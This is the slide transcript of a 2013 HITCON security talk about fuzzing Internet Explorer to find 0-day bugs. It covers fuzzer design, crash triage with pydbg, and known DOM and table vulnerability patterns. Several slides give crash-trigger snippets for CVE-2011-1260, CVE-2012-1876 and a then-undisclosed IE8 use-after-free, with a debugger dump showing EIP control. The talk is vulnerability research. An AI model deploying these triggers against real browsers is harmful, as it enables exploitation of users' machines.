Upgrade to Pro — share decks privately, control downloads, hide ads and more …

0-Day 輕鬆談 - Happy Fuzzing Internet Explorer

Orange
July 19, 2013

0-Day 輕鬆談 - Happy Fuzzing Internet Explorer

0-Day 怎麼來?
Fuzzing 做為一種尋找漏洞的方式,讓你連躺著都有 0-Day 進帳。

這是一場輕鬆的演講,
分享一些 Fuzzer 的設計、Fuzzing 上的心得、Fuzzing Internet Explorer 上的方向。

最後為本次 HITCON 揭露一個未公開的 0-Day。

Orange

July 19, 2013
Tweet

More Decks by Orange

Other Decks in Technology

Transcript

  1. About Me •  蔡政達 aka Orange •  2009 台灣駭客年會競賽 冠軍

    •  2011, 2012 全國資安競賽 金盾獎冠軍 •  2011 東京 AVTOKYO 講師 •  2012 香港 VXRLConf 講師 •  台灣 PHPConf, WebConf, PyConf 講師 •  專精於 –  駭客攻擊手法 –  Web Security –  Windows Vulnerability Exploitation
  2. 但今天來聊聊 0-Day 以及 Fuzzing (不是我專門的領域 QQ) But Today Let's Talk

    About 0-Day and Fuzzing (I am Not Expert in This, But Just Share)
  3. Debug a Process >>> import pydbg >>> dbg = pydbg()

    >>> dbg.load( file ) # or dbg.attach( pid ) >>> dbg.run()
  4. Logger (Filter) •  滿山滿谷的 崩潰 •  不是所有的 Crash 能成 為

    Exploit •  九成以上是 Null Pointer 只能當 DoS 用 –  mov eax, [ebx+0x70] –  ; ebx = 0 •  EIP •  Disassemble –  jmp reg –  call reg –  call [reg + CONST] •  Stack •  SHE Chain
  5. 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec

    啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec
  6. 已知型態弱點 •  研究以往的弱點我們可以知道 •  Internet Explorer is Not Good at

    – Parsing DOM Tree – Parsing <TABLE> with <TR> & <TD> – Parsing <TABLE> with <COL> •  CTreeNode & CTableLayout
  7. Pseudo Scenario of Use-After-Free 1.  <foo> 2.  <bla id=x> 3. 

    <bar id=y> 4.  …… 5.  </bar> 6.  </bla> 7.  </foo> 1.  <script> 2.  var x = document.getElementById( 'x' ); 3.  var y = document.getElementById( 'y' ); 4.  x.innerHTML = 'AAAA…'; 5.  y.length = 100px; 6.  </script>
  8. Ex: CVE-2011-1260 (Not Full Version) 1.  <body> 2.  <script> 3. 

    document.body.innerHTML += "<object …>TAG_1</object>"; 4.  document.body.innerHTML += "<aid='tag_3' style='…'>TAG_3</a>"; 5.  document.body.innerHTML +="AAAAAAA"; 6.  document.body.innerHTML += "<strong style='…'>TAG_11</strong>"; 7.  </script> 8.  </body>
  9. Ex: CVE-2012-1876 (Heap Overflow) 1.  <script> setTimeout("trigger();",1); </script> 2.  <TABLE

    style="table-layout: fixed; "> 3.  <col id="132" width="41" span="1" > </col> 4.  </col> 5.  </TABLE> 1.  function trigger() { 2.  var obj_col = document.getElementById("132"); 3.  obj_col.width = "42765"; 4.  obj_col.span = 1000; 5.  }
  10. Fuzzing with DOM Tree https://www.facebook.com/zztao •  Using DOM Methods to

    Manipulate Objects –  CreateElement –  removeChild appendChild –  InnerHTML outerText –  createRange –  addEventListener –  select –  …
  11. Putting All Together 1)  Randomize HTML Node for Initial 2) 

    Manipulated Nodes with DOM Method ( Can Also Play with CSS at the Same Time)
  12. Generally, Single Machine Run Can Find 1 or 2 IE

    0-Day in a Month I Have Successfully Found 0-Days from IE6 to IE9, For IE10+ I Haven't Tried Because I am Too Lazy : (
  13. So I Found a 0-Day For HITCON 1)  Work on

    Internet Explore 8 2)  Mshtml.dll 8.0.6001.23501
  14. call edx (e10.950): Access violation - code c0000005 (!!! second

    chance !!!) eax=3dbf00a4 ebx=0019bb30 ecx=037f12c8 edx=085d8b53 esi=0172b130 edi=00000000 eip=085d8b53 esp=0172b100 ebp=0172b11c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 085d8b53 ?? ???
  15. Writing Exploit •  Windows Protection – DEP – Luckily If Windows XP

    We Don't Care About ASLR – Luckily It is Not IE10+ that It Hasn't vTable Guard
  16. Proof-of-Concept 1.  <!DOCTYPE html> 2.  <table> 3.  <tr><legend><span > 4. 

    <q id='e'> 5.  <a align="center"> <th> O </th> </a> 6.  </q> 7.  </span></legend></tr> 8.  </table> 9.  </html> 1.  window.onload = function(){ 2.  var x = document.getElementById('e'); 3.  x.outerText = ''; 4.  }
  17. Work on •  mshtml.dll …… # …… •  mshtml.dll …...

    # 2013 / 05 / 14 •  mshtml.dll 8.0.6001.23501 # 2013 / 06 / 11 •  mshtml.dll 8.0.6001.23507 # 2013 / 07 / 09